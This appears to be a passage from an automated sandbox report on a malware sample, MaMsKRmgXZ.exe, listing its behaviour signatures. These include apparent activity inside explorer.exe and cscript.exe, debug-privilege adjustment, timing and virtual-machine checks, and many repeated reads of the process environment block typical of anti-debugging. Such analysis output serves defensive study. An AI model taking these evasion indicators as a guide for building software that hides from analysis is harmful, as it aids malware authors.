      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9865Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 869Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 887Jump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeWindow / User API: threadDelayed 9850Jump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeAPI coverage: 0.9 %
      Source: C:\Windows\SysWOW64\cscript.exeAPI coverage: 2.2 %
      Source: C:\Windows\SysWOW64\cscript.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 0_2_004062DD FindFirstFileA,FindClose,0_2_004062DD
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 0_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004057A2
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 0_2_00402765 FindFirstFileA,0_2_00402765
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeAPI call chain: ExitProcess graph end nodegraph_0-4782
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeAPI call chain: ExitProcess graph end nodegraph_0-4933
      Source: MaMsKRmgXZ.exe, 00000002.00000002.9957323893.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9947544305.0000000004156000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9886496116.0000000004156000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9886681382.0000000004156000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9957522419.0000000004156000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14576881586.000000000CE88000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000CE88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: MaMsKRmgXZ.exe, 00000002.00000003.9947544305.0000000004156000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9886496116.0000000004156000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9886681382.0000000004156000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9957522419.0000000004156000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWG
      Source: explorer.exe, 00000004.00000002.14576881586.000000000CE88000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000CE88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWgTuQ
      Source: explorer.exe, 00000004.00000000.9902197549.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14576881586.000000000CE47000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWLE`
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 0_2_6EC01A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6EC01A98
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34221763 rdtsc 2_2_34221763
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34217425 mov eax, dword ptr fs:[00000030h]2_2_34217425
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34217425 mov ecx, dword ptr fs:[00000030h]2_2_34217425
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3427B420 mov eax, dword ptr fs:[00000030h]2_2_3427B420
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3427B420 mov eax, dword ptr fs:[00000030h]2_2_3427B420
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426F42F mov eax, dword ptr fs:[00000030h]2_2_3426F42F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426F42F mov eax, dword ptr fs:[00000030h]2_2_3426F42F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426F42F mov eax, dword ptr fs:[00000030h]2_2_3426F42F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426F42F mov eax, dword ptr fs:[00000030h]2_2_3426F42F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426F42F mov eax, dword ptr fs:[00000030h]2_2_3426F42F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34269429 mov eax, dword ptr fs:[00000030h]2_2_34269429
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341D640D mov eax, dword ptr fs:[00000030h]2_2_341D640D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429D430 mov eax, dword ptr fs:[00000030h]2_2_3429D430
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429D430 mov eax, dword ptr fs:[00000030h]2_2_3429D430
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429F409 mov eax, dword ptr fs:[00000030h]2_2_3429F409
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34276400 mov eax, dword ptr fs:[00000030h]2_2_34276400
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34276400 mov eax, dword ptr fs:[00000030h]2_2_34276400
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DB420 mov eax, dword ptr fs:[00000030h]2_2_341DB420
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426E461 mov eax, dword ptr fs:[00000030h]2_2_3426E461
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341ED454 mov eax, dword ptr fs:[00000030h]2_2_341ED454
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341ED454 mov eax, dword ptr fs:[00000030h]2_2_341ED454
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341ED454 mov eax, dword ptr fs:[00000030h]2_2_341ED454
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341ED454 mov eax, dword ptr fs:[00000030h]2_2_341ED454
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341ED454 mov eax, dword ptr fs:[00000030h]2_2_341ED454
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341ED454 mov eax, dword ptr fs:[00000030h]2_2_341ED454
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AA464 mov eax, dword ptr fs:[00000030h]2_2_342AA464
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429F478 mov eax, dword ptr fs:[00000030h]2_2_3429F478
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0445 mov eax, dword ptr fs:[00000030h]2_2_341F0445
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0445 mov eax, dword ptr fs:[00000030h]2_2_341F0445
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0445 mov eax, dword ptr fs:[00000030h]2_2_341F0445
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0445 mov eax, dword ptr fs:[00000030h]2_2_341F0445
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0445 mov eax, dword ptr fs:[00000030h]2_2_341F0445
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0445 mov eax, dword ptr fs:[00000030h]2_2_341F0445
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34260443 mov eax, dword ptr fs:[00000030h]2_2_34260443
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E8470 mov eax, dword ptr fs:[00000030h]2_2_341E8470
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E8470 mov eax, dword ptr fs:[00000030h]2_2_341E8470
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421D450 mov eax, dword ptr fs:[00000030h]2_2_3421D450
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421D450 mov eax, dword ptr fs:[00000030h]2_2_3421D450
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420E45E mov eax, dword ptr fs:[00000030h]2_2_3420E45E
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420E45E mov eax, dword ptr fs:[00000030h]2_2_3420E45E
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420E45E mov eax, dword ptr fs:[00000030h]2_2_3420E45E
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420E45E mov eax, dword ptr fs:[00000030h]2_2_3420E45E
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420E45E mov eax, dword ptr fs:[00000030h]2_2_3420E45E
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426D4A0 mov ecx, dword ptr fs:[00000030h]2_2_3426D4A0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426D4A0 mov eax, dword ptr fs:[00000030h]2_2_3426D4A0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426D4A0 mov eax, dword ptr fs:[00000030h]2_2_3426D4A0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342144A8 mov eax, dword ptr fs:[00000030h]2_2_342144A8
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342954B0 mov eax, dword ptr fs:[00000030h]2_2_342954B0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342954B0 mov ecx, dword ptr fs:[00000030h]2_2_342954B0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E0485 mov ecx, dword ptr fs:[00000030h]2_2_341E0485
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342784BB mov eax, dword ptr fs:[00000030h]2_2_342784BB
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421E4BC mov eax, dword ptr fs:[00000030h]2_2_3421E4BC
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421648A mov eax, dword ptr fs:[00000030h]2_2_3421648A
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421648A mov eax, dword ptr fs:[00000030h]2_2_3421648A
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421648A mov eax, dword ptr fs:[00000030h]2_2_3421648A
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421B490 mov eax, dword ptr fs:[00000030h]2_2_3421B490
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421B490 mov eax, dword ptr fs:[00000030h]2_2_3421B490
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426C490 mov eax, dword ptr fs:[00000030h]2_2_3426C490
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E24A2 mov eax, dword ptr fs:[00000030h]2_2_341E24A2
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E24A2 mov ecx, dword ptr fs:[00000030h]2_2_341E24A2
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342154E0 mov eax, dword ptr fs:[00000030h]2_2_342154E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421E4EF mov eax, dword ptr fs:[00000030h]2_2_3421E4EF
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421E4EF mov eax, dword ptr fs:[00000030h]2_2_3421E4EF
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421A4F0 mov eax, dword ptr fs:[00000030h]2_2_3421A4F0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421A4F0 mov eax, dword ptr fs:[00000030h]2_2_3421A4F0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429F4FD mov eax, dword ptr fs:[00000030h]2_2_3429F4FD
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426E4F2 mov eax, dword ptr fs:[00000030h]2_2_3426E4F2
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426E4F2 mov eax, dword ptr fs:[00000030h]2_2_3426E4F2
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342094FA mov eax, dword ptr fs:[00000030h]2_2_342094FA
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342014C9 mov eax, dword ptr fs:[00000030h]2_2_342014C9
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342014C9 mov eax, dword ptr fs:[00000030h]2_2_342014C9
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342014C9 mov eax, dword ptr fs:[00000030h]2_2_342014C9
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342014C9 mov eax, dword ptr fs:[00000030h]2_2_342014C9
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342014C9 mov eax, dword ptr fs:[00000030h]2_2_342014C9
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E64F0 mov eax, dword ptr fs:[00000030h]2_2_341E64F0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]2_2_3420F4D0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]2_2_3420F4D0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]2_2_3420F4D0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]2_2_3420F4D0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]2_2_3420F4D0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]2_2_3420F4D0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]2_2_3420F4D0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]2_2_3420F4D0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]2_2_3420F4D0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342044D1 mov eax, dword ptr fs:[00000030h]2_2_342044D1
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342044D1 mov eax, dword ptr fs:[00000030h]2_2_342044D1
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421F523 mov eax, dword ptr fs:[00000030h]2_2_3421F523
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34211527 mov eax, dword ptr fs:[00000030h]2_2_34211527
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222539 mov eax, dword ptr fs:[00000030h]2_2_34222539
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E2500 mov eax, dword ptr fs:[00000030h]2_2_341E2500
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341D753F mov eax, dword ptr fs:[00000030h]2_2_341D753F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341D753F mov eax, dword ptr fs:[00000030h]2_2_341D753F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341D753F mov eax, dword ptr fs:[00000030h]2_2_341D753F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429550D mov eax, dword ptr fs:[00000030h]2_2_3429550D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429550D mov eax, dword ptr fs:[00000030h]2_2_3429550D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429550D mov eax, dword ptr fs:[00000030h]2_2_3429550D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420E507 mov eax, dword ptr fs:[00000030h]2_2_3420E507
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420E507 mov eax, dword ptr fs:[00000030h]2_2_3420E507
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420E507 mov eax, dword ptr fs:[00000030h]2_2_3420E507
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420E507 mov eax, dword ptr fs:[00000030h]2_2_3420E507
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420E507 mov eax, dword ptr fs:[00000030h]2_2_3420E507
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420E507 mov eax, dword ptr fs:[00000030h]2_2_3420E507
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420E507 mov eax, dword ptr fs:[00000030h]2_2_3420E507
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420E507 mov eax, dword ptr fs:[00000030h]2_2_3420E507
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E3536 mov eax, dword ptr fs:[00000030h]2_2_341E3536
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E3536 mov eax, dword ptr fs:[00000030h]2_2_341E3536
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421C50D mov eax, dword ptr fs:[00000030h]2_2_3421C50D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421C50D mov eax, dword ptr fs:[00000030h]2_2_3421C50D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F51B mov eax, dword ptr fs:[00000030h]2_2_3428F51B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F51B mov eax, dword ptr fs:[00000030h]2_2_3428F51B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F51B mov eax, dword ptr fs:[00000030h]2_2_3428F51B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F51B mov eax, dword ptr fs:[00000030h]2_2_3428F51B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F51B mov eax, dword ptr fs:[00000030h]2_2_3428F51B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F51B mov eax, dword ptr fs:[00000030h]2_2_3428F51B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F51B mov ecx, dword ptr fs:[00000030h]2_2_3428F51B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F51B mov ecx, dword ptr fs:[00000030h]2_2_3428F51B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F51B mov eax, dword ptr fs:[00000030h]2_2_3428F51B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F51B mov eax, dword ptr fs:[00000030h]2_2_3428F51B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F51B mov eax, dword ptr fs:[00000030h]2_2_3428F51B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F51B mov eax, dword ptr fs:[00000030h]2_2_3428F51B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428F51B mov eax, dword ptr fs:[00000030h]2_2_3428F51B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F252B mov eax, dword ptr fs:[00000030h]2_2_341F252B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F252B mov eax, dword ptr fs:[00000030h]2_2_341F252B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F252B mov eax, dword ptr fs:[00000030h]2_2_341F252B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F252B mov eax, dword ptr fs:[00000030h]2_2_341F252B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F252B mov eax, dword ptr fs:[00000030h]2_2_341F252B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F252B mov eax, dword ptr fs:[00000030h]2_2_341F252B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F252B mov eax, dword ptr fs:[00000030h]2_2_341F252B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34201514 mov eax, dword ptr fs:[00000030h]2_2_34201514
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34201514 mov eax, dword ptr fs:[00000030h]2_2_34201514
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34201514 mov eax, dword ptr fs:[00000030h]2_2_34201514
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34201514 mov eax, dword ptr fs:[00000030h]2_2_34201514
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34201514 mov eax, dword ptr fs:[00000030h]2_2_34201514
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34201514 mov eax, dword ptr fs:[00000030h]2_2_34201514
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426C51D mov eax, dword ptr fs:[00000030h]2_2_3426C51D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34269567 mov eax, dword ptr fs:[00000030h]2_2_34269567
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E754C mov eax, dword ptr fs:[00000030h]2_2_341E754C
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E254C mov eax, dword ptr fs:[00000030h]2_2_341E254C
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341FE547 mov eax, dword ptr fs:[00000030h]2_2_341FE547
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34216540 mov eax, dword ptr fs:[00000030h]2_2_34216540
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34218540 mov eax, dword ptr fs:[00000030h]2_2_34218540
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342BB55F mov eax, dword ptr fs:[00000030h]2_2_342BB55F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342BB55F mov eax, dword ptr fs:[00000030h]2_2_342BB55F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34276550 mov eax, dword ptr fs:[00000030h]2_2_34276550
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AA553 mov eax, dword ptr fs:[00000030h]2_2_342AA553
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341FC560 mov eax, dword ptr fs:[00000030h]2_2_341FC560
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342685AA mov eax, dword ptr fs:[00000030h]2_2_342685AA
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421A580 mov eax, dword ptr fs:[00000030h]2_2_3421A580
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421A580 mov eax, dword ptr fs:[00000030h]2_2_3421A580
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34219580 mov eax, dword ptr fs:[00000030h]2_2_34219580
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34219580 mov eax, dword ptr fs:[00000030h]2_2_34219580
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429F582 mov eax, dword ptr fs:[00000030h]2_2_3429F582
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3425E588 mov eax, dword ptr fs:[00000030h]2_2_3425E588
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3425E588 mov eax, dword ptr fs:[00000030h]2_2_3425E588
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E45B0 mov eax, dword ptr fs:[00000030h]2_2_341E45B0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E45B0 mov eax, dword ptr fs:[00000030h]2_2_341E45B0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426C592 mov eax, dword ptr fs:[00000030h]2_2_3426C592
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34212594 mov eax, dword ptr fs:[00000030h]2_2_34212594
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34287591 mov edi, dword ptr fs:[00000030h]2_2_34287591
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421A5E7 mov ebx, dword ptr fs:[00000030h]2_2_3421A5E7
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421A5E7 mov eax, dword ptr fs:[00000030h]2_2_3421A5E7
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342655E0 mov eax, dword ptr fs:[00000030h]2_2_342655E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342115EF mov eax, dword ptr fs:[00000030h]2_2_342115EF
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF5C7 mov eax, dword ptr fs:[00000030h]2_2_341DF5C7
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF5C7 mov eax, dword ptr fs:[00000030h]2_2_341DF5C7
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF5C7 mov eax, dword ptr fs:[00000030h]2_2_341DF5C7
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF5C7 mov eax, dword ptr fs:[00000030h]2_2_341DF5C7
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF5C7 mov eax, dword ptr fs:[00000030h]2_2_341DF5C7
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF5C7 mov eax, dword ptr fs:[00000030h]2_2_341DF5C7
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF5C7 mov eax, dword ptr fs:[00000030h]2_2_341DF5C7
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF5C7 mov eax, dword ptr fs:[00000030h]2_2_341DF5C7
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF5C7 mov eax, dword ptr fs:[00000030h]2_2_341DF5C7
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426C5FC mov eax, dword ptr fs:[00000030h]2_2_3426C5FC
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342605C6 mov eax, dword ptr fs:[00000030h]2_2_342605C6
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421C5C6 mov eax, dword ptr fs:[00000030h]2_2_3421C5C6
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342165D0 mov eax, dword ptr fs:[00000030h]2_2_342165D0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426B5D3 mov eax, dword ptr fs:[00000030h]2_2_3426B5D3
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341EB5E0 mov eax, dword ptr fs:[00000030h]2_2_341EB5E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341EB5E0 mov eax, dword ptr fs:[00000030h]2_2_341EB5E0
